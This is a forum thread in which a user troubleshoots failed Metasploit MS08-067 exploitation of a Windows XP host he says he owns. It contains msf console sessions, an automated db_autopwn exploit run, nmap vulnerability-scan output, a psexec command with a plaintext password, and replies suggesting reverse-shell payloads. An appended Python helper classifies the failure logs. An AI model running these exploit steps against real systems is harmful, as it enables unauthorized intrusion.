Topic: Question when exploiting a target via Metasploit ms08_067_netapi
raymond hua
« on: December 17, 2009, 10:56:12 PM »

My test target is 9.181.147.90. When I had configured the settings and began to exploit, the error information below appeared: Exploit failed: Connection reset by peer.
After the first attempt, I tried to exploit it again. Then the error information was: Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
At the same time port 445 was closed.


msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set

Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                             Value
  ----                             -----
  ConnectTimeout                   10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          true
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  DisablePayloadHandler            false
  EXITFUNC                         thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                false
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size         1024
  SMB::pipe_write_min_size         1
  SMBDirect                        true
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                       SSL3
  TCP::max_send_size               0
  TCP::send_delay                  0
  WfsDelay                         0
  lhost                            9.181.73.46
  payload                          generic/shell_bind_tcp
  rhost                            9.181.147.90
  target                           0

msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
  • Selected Target: Windows XP SP2 Chinese - Traditional (NX)
  • Triggering the vulnerability...
  • [-] Exploit failed: Connection reset by peer
  • Exploit completed, but no session was created.

Then I used another way: I let Metasploit scan and execute the exploits automatically via the command db_autopwn -p -t -e. The results are below; the exploitation stayed at "Started bind handler" for a long time, and at last the attempt failed.

msf > db_autopwn -p -t -e
  • Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
  • Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
  • (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445...
  • Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
  • (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139...
  • Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
  • (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139...
  • Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25...
  • Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25...
  • Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
  • (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139...
  • Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
  • Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445...
  • Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139...
  • Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
  • (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
  • Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
  • (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
  • [-] Exploit failed: The following options failed to validate: MAILTO.
  • Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
  • (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
  • Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
  • (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139...
  • Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
  • (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
  • Started bind handler
  • Connecting to SMTP server 9.181.147.90:25...
  • Started bind handler
  • Started bind handler
  • Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25...
  • Job limit reached, waiting on modules to finish...
  • Connected to target SMTP server.
  • Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
  • Started bind handler
  • [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
  • Started bind handler
  • Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  • Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
  • Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
  • Sending exploit ...
  • [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
  • Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
  • (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
  • (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139...
  • Started bind handler
  • Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
  • (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139...
  • Started bind handler
  • [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
  • Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • Started bind handler
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
  • (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • [-] Exploit failed: The connection timed out (9.181.147.90:445).
  • (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
  • [-] Exploit failed: can't convert nil into Integer
  • Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
  • (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139...
  • [-] Exploit failed: can't convert nil into Integer
  • Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139...
  • Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Connecting to the SMB service...
  • Started bind handler
  • [-] Exploit failed: The connection timed out (9.181.147.90:139).
  • (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler
  • [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
  • (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139...
  • Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445...
  • Job limit reached, waiting on modules to finish...
  • Started bind handler

I'd appreciate it if someone could help me, thanks!

3PIL0GU3
« Reply #1 on: December 18, 2009, 01:37:09 AM »

Did you try using a Reverse TCP payload instead of a bind shell payload? You may have better luck.

----------------------------
CEH
Ketchup
« Reply #2 on: December 19, 2009, 12:24:43 AM »

I sincerely hope you have permission to exploit that host. There could be an IPS or AntiVirus product stopping your exploit.

~~~~~~~~~~~~~~
Ketchup
raymond hua
« Reply #3 on: December 20, 2009, 07:46:32 PM »

To: 3PIL0GU3

Following your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.


Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                             Value
  ----                             -----
  ConnectTimeout                   10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          True
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  DisablePayloadHandler            false
  EXITFUNC                         thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                False
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size         1024
  SMB::pipe_write_min_size         1
  SMBDirect                        True
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                       SSL3
  TCP::max_send_size               0
  TCP::send_delay                  0
  WfsDelay                         0
  lhost                            9.181.73.46
  payload                          windows/shell/reverse_tcp
  rhost                            9.181.147.90
  target                           0

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
  • Selected Target: Windows XP SP2 Chinese - Traditional (NX)
  • Triggering the vulnerability...
  • [-] Exploit failed: Connection reset by peer
  • Exploit completed, but no session was created.

After the attempt, I used another bash shell to check port 445; it was closed. Before the attempt, port 445 was open. Maybe I should show my scan results from Nmap for your reference.

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间
NSE: Script Scanning completed.
Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)
Host is up (0.00s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
|  smb-check-vulns: 
|    MS08-067: VULNERABLE
|    Conficker: Likely CLEAN
|    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
raymond hua
« Reply #4 on: December 20, 2009, 08:22:29 PM »

To: Ketchup

9.181.147.90 is owned by me and all the tests have been approved by my manager.
I have uninstalled our firewall and I think there is no IPS in our internal network. But I do not know whether some limitation exists. For this case, I can exploit 9.181.147.90 via psexec and have administrator authority.


C:\>psexec \\9.181.147.90 -u hua -p basketball -e cmd.exe

PsExec v1.91 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

I sincerely hope for your reply!
LSOChris
« Reply #5 on: December 24, 2009, 11:49:00 AM »

My guess is that the return is bad or something like DEP is preventing code execution. Try manually setting the target.
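The symptom the thread circles around is the sequence "reset while triggering, refused on retry, port 445 closed afterwards", which is what a crashed Server service looks like from the outside (the bad-return / DEP case in the reply above), and which a defender would record as an SMB outage caused by the attempt rather than a blocked connection. The triage helper below is an added example, not code from the thread or from Metasploit or Nmap; it parses the kinds of Metasploit failure lines and the Nmap port table quoted in the thread (sample inputs are constructed from them) and combines them into that diagnosis.

```python
import re
# Constructed sample: the distinct failure lines quoted in this thread, in order.
MSF_LOG = """\
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[-] Exploit failed: The connection timed out (9.181.147.90:139).
[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
"""
# Constructed: nmap port table from the thread; the "after" scan just lacks the 445 row.
NMAP_BEFORE = """\
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
"""
NMAP_AFTER = NMAP_BEFORE.replace("445/tcp  open  microsoft-ds\n", "")
ERROR_PATTERNS = [
    ("reset", re.compile(r"Connection reset by peer")),
    ("refused", re.compile(r"refused by the remote host \([\d.]+:(\d+)\)")),
    ("timeout", re.compile(r"connection timed out \([\d.]+:(\d+)\)")),
    ("rpc_fault", re.compile(r"DCERPC FAULT => (\w+)")),
]

def classify_failures(log_text):
    """[(kind, detail)] per '[-] Exploit failed' line; detail = port or fault name."""
    result = []
    for line in log_text.splitlines():
        if not line.startswith("[-] Exploit failed"):
            continue
        for kind, rx in ERROR_PATTERNS:
            m = rx.search(line)
            if m:
                result.append((kind, m.group(1) if m.groups() else None))
                break
        else:
            result.append(("other", None))
    return result

def port_open(nmap_text, port):
    """True if <port>/tcp is listed open; a missing row is in nmap's 'Not shown: N closed ports'."""
    m = re.search(r"^%d/tcp\s+(\S+)" % port, nmap_text, re.MULTILINE)
    return bool(m) and m.group(1) == "open"

def diagnose(failures, open_before, open_after):
    """Reset while triggering, then refused on retry, with the listener gone = the service
    died during the attempt; refused/timeout from the first try = filter or no listener."""
    kinds = [k for k, _ in failures]
    if open_before and not open_after and kinds[:1] == ["reset"]:
        return "service crashed during attempt"
    if open_before and open_after and "reset" in kinds:
        return "connection cut but service still listening"
    if kinds and kinds[0] in ("refused", "timeout"):
        return "no reachable listener before attempt"
    return "inconclusive"
```

Run against the thread's own sequence (445 open before, closed after, reset first) it returns "service crashed during attempt"; a host behind an IPS or AV that resets the session typically keeps 445 listening, which lands in the second branch.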